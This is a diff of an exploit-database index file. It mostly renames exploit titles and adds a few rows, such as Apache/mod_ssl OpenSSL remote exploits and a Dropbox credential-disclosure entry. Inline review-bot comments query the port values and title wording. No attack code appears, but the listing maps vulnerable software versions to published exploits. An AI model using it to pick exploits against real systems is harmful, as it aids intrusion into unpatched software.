+18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Authenticated OS Command Injection",2012-04-09,Metasploit,php,webapps,0
 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0
@@ -16222,7 +16221,7 @@ id,file,description,date,author,platform,type,port
 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects - Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0
 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0
-18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execution",2012-04-14,Metasploit,php,remote,0
+18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution",2012-04-14,Metasploit,php,remote,0
 18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
 18741,platforms/php/webapps/18741.txt,"joomla Component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
@@ -16264,7 +16263,7 @@ id,file,description,date,author,platform,type,port
 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0
 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0
-18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0
+18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0
 18798,platforms/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0
 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0
 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0
@@ -16359,7 +16358,7 @@ id,file,description,date,author,platform,type,port
 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting",2012-05-18,"Henry Hoggard",php,webapps,0
 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow",2012-05-23,Metasploit,windows,remote,0
-18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,Metasploit,php,webapps,0
+18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary .PHP File Upload",2012-05-25,Metasploit,php,webapps,0
 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC)",2012-05-23,41.w4r10r,windows,dos,0
 18917,platforms/linux/local/18917.txt,"Apache - Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0
@@ -17378,7 +17377,7 @@ id,file,description,date,author,platform,type,port
 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0
 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0
 20028,platforms/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0
-20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0
+20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload",2012-07-23,Metasploit,php,webapps,0
 20030,platforms/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
 20031,platforms/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
 20032,platforms/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
@@ -17410,7 +17409,7 @@ id,file,description,date,author,platform,type,port
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
 20062,platforms/php/webapps/20062.py,"Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0
-20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection",2012-07-23,dookie,windows,webapps,0
+20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0
 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
@@ -17430,7 +17429,7 @@ id,file,description,date,author,platform,type,port
 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0
 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0
 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0
-20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0
+20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0
 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0
 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0
@@ -17509,7 +17508,7 @@ id,file,description,date,author,platform,type,port
 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) - SQL Injection",2012-08-01,D4NB4R,php,webapps,0
 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0
 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0
-20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0
+20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary .PHP File Upload",2012-08-02,Metasploit,php,webapps,0
 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0
 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0
 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
@@ -17997,7 +17996,7 @@ id,file,description,date,author,platform,type,port
 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0
 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0
 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id Parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0
-20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0
+20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary .PHP File Upload",2012-08-22,Metasploit,php,webapps,0
 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0
 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0
 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0
@@ -18168,7 +18167,7 @@ id,file,description,date,author,platform,type,port
 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows - Kernel Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0
 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0
 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0
-20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0
+20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0
 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0
 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0
 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
@@ -18824,7 +18823,7 @@ id,file,description,date,author,platform,type,port
 21543,platforms/java/webapps/21543.txt,"Ruslan Communications Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0
 21544,platforms/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos,0
 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps,0
-21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
+21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0
 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0
 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
@@ -18853,7 +18852,8 @@ id,file,description,date,author,platform,type,port
 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0
 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0
 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0
-21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0
+21575,platforms/multiple/dos/21575.txt,"Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0
+40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - ext.dll Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0
 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0
@@ -18947,8 +18947,8 @@ id,file,description,date,author,platform,type,port
 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 - Form Field HTML Injection",2002-07-29,delusion,php,webapps,0
 21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
-21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0
-21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0
+21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
+40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
 21675,platforms/windows/remote/21675.pl,"Trillian 0.x - IRC Module Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
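Review bot: Both added rows (ids 21671 and 40347) set the port column to `80` where the rows they replace had `0`, yet the old and new titles describe an SSLv2 client-key / `KEY_ARG` overflow in mod_ssl/OpenSSL, which would presumably be reached on the HTTPS listener rather than the plain-HTTP one. The port column is what people filter on when matching this index against scan results, so `443` (or leaving `0`) looks more accurate; worth confirming against each file before merging. The hunk also drops the row for id 21672 and puts 40347 in its place, so if `platforms/unix/remote/21672.c` is still in the tree it is no longer indexed.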
@@ -19109,7 +19109,7 @@ id,file,description,date,author,platform,type,port
 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0
 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
-21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0
+21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary .PHP File Upload",2012-10-10,Metasploit,php,webapps,0
 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0
 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322
 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217
@@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port
 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
-22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
+22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0
 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
@@ -19760,9 +19760,9 @@ id,file,description,date,author,platform,type,port
 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos,0
 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0
 22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - ext.dll Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0
-22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorization Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0
+22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0
 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0
-22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String",2003-04-21,"Matthew Murphy",multiple,dos,0
+22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",multiple,dos,0
 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0
 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0
 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0
@@ -19921,7 +19921,7 @@ id,file,description,date,author,platform,type,port
 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0
 22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0
 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0
-22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0
+22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0
 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0
 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0
 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0
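Review bot: The new title for id 22675, `Geeklog 1.3.x - Authenticated SQL Injection`, does not say the same thing as the old `Authentication SQL Injection`: the old wording reads as an injection in the authentication step, the new one as an injection that needs a valid login first. Anyone triaging exposure from this index would rate those two cases very differently, so the rename should be checked against the advisory in `22675.txt`. If the flaw does sit in the login path, keeping `Authentication SQL Injection` would be safer than the normalised form. The same substitution is applied to vbPortal (id 23140) in the later hunk at `-20368,7`.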
@@ -20029,7 +20029,7 @@ id,file,description,date,author,platform,type,port
 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0
 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0
 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0
-22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0
+22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution",2012-11-19,Metasploit,windows,remote,0
 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0
 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0
 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0
@@ -20169,7 +20169,7 @@ id,file,description,date,author,platform,type,port
 22951,platforms/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0
 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0
 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0
-22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution",2003-07-24,"Martin Eiszner",php,webapps,0
+22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",php,webapps,0
 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - db.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0
 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0
 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0
@@ -20312,7 +20312,7 @@ id,file,description,date,author,platform,type,port
 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0
 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
-23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authentication User Enumeration",2012-12-02,kingcope,multiple,remote,0
+23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0
@@ -20368,7 +20368,7 @@ id,file,description,date,author,platform,type,port
 23137,platforms/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0
 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0
 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - cgi-lib.dll Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0
-23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authentication SQL Injection",2003-09-12,frog,php,webapps,0
+23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0
 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0
 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0
 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0
@@ -20656,9 +20656,9 @@ id,file,description,date,author,platform,type,port
 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0
 23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,multiple,remote,0
 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0
-23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0
-23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0
-23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0
+23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0
+23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0
+23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0
 23438,platforms/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service",2003-12-15,"Stefan Hecker",linux,dos,0
 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0
 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0
@@ -20868,8 +20868,8 @@ id,file,description,date,author,platform,type,port
 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0
 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0
 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0
